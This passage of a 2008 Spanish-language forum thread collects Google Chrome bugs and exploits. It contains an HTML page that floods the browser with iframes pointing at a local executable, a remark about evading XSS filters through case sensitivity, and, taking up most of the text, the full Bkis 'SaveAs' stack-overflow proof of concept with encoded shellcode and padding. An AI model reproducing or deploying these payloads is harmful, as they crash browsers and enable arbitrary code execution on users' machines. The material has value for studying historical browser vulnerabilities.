Ojo porque Google Chrome diferencia entre mayusculas y minusculas al momento de ejecutar javascript causando una grán incompatibilidad con algunos sitios webs que por costumbre inician la primera letra de sus funciones con mayusculas entre varios otros, pero no así en la declaración de la utilización de scripts:
Citar
javascript:alert("test");
Haciendo que sea incompatible para el buén funcionamiento y accesible para ataques de tipo XSS con escapes de case sensitive.


Talves esto sea la principal razón de la incompatibilidad con algunos sitios webs.


Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: hackeen en 5 Septiembre 2008, 07:50 am

 ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D



Código:
<html>
<script>
function down(){
document.write('<iframe src="file:///C:/WINDOWS/NOTEPAD.EXE" frameborder="0" width="0" height="0"></iframe>');
}
setInterval("down()",200)
</script>

 ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D


Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: Trancek en 5 Septiembre 2008, 17:16 pm
Y otro mas que hace uso de la funcion SaveAs, vamos que tienes que guardar la pagina en tu pc, y poca gente hace eso yo creo...

http://security.bkis.vn/

---
We tested Google Chrome 0.2.149.27 on Windows XP SP2 (Open Calculator)

http://security.bkis.vn/Proof-Of-Concept/PoC-XPSP2.html


Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 5 Septiembre 2008, 19:28 pm
Este ultimo PoC "Save As" no me funciona, y ninguna calculadora o calc.exe se ejecuto, al solo me ocasiona el DoS y/o simplemente me cierra la app, esta raro el PoC

(http://img526.imageshack.us/img526/8893/chromes0xbn6.png) (http://imageshack.us)

-berz3k.



Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: WHK en 6 Septiembre 2008, 00:31 am
Por ahí escuché que Google Chrome no soporta RSS  :(

http://foro.elhacker.net/.xml.html;sa=news;board=34;limit=10;type=rss


Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: WHK en 6 Septiembre 2008, 01:26 am
desbordamiento de la memoria y la ejecución arbitraria de código..

Código
  1. <!--
  2. This file is saved as "Unicode" type because Chrome convert data (payload) to "Unicode" while handling. This PoC Code execute a calculator.
  3.  
  4. Here comes details :
  5.  
  6. We (SVRT-Bkis) have just discovered vulnerability in Google Chrome 0.2.149.27 and would like to inform you with this.
  7.  
  8. The vulnerability is caused due to a boundary error when handling the “SaveAs” function. On saving a malicious page with an overly long title (<title> tag in HTML), the program causes a stack-based overflow and makes it possible for attackers to execute arbitrary code on users’ systems.
  9.  
  10. To exploit the Vulnerability, a hacker might construct a specially crafted Web page, which contains malicious code. He then tricks users into visiting his Website and convinces them to save this Page. Right after that, the code would be executed, giving him the privilege to make use of the affected system.
  11.  
  12. Tested on Google Chrome (Language: Vietnamese) on Windows XP SP2.
  13.  
  14. Discoverer : Le Duc Anh - SVRT - Bkis
  15. SVRT, which is short for Security Vulnerability Research Team, is one of Bkis researching groups. SVRT specializes in the detection, alert and announcement of security vulnerabilities in software, operating systems, network protocols and embedded systems…
  16.  
  17. Website : http://security.bkis.vn
  18. Mail : svrt[at]bkav.com.vn
  19. -->
  20.  
  21. &#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#37008;&#60166;&#2827;)&#37008;&#37008;&#37008;&#37008;&#37008;&#37008;&#37008;&#37008;&#51505;&#59779;&#9332;&#23540;&#29569;&#60435;&#13869;&#33630;&#64747;&#62690;&#50448;&#24178;&#11756;&#7101;&#42704;&#23370;&#11412;&#54745;&#13731;&#445;&#11468;&#6109;&#6503;&#24509;&#7170;&#51190;&#43328;&#10998;&#60651;&#21500;&#61421;&#43741;&#31191;&#23058;&#51353;&#445;&#11464;&#14557;&#8551;&#54653;&#12723;&#46391;&#12647;&#24509;&#41991;&#31338;&#61160;&#40455;&#42632;&#28278;&#60777;&#21070;&#28007;&#54586;&#12700;&#54683;&#9604;&#22493;&#44391;&#24198;&#11756;&#14013;&#29392;&#43015;&#31628;&#42687;&#60783;&#3661;&#23228;&#17843;&#41134;&#9062;&#41313;&#19979;&#12887;&#11663;&#24118;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA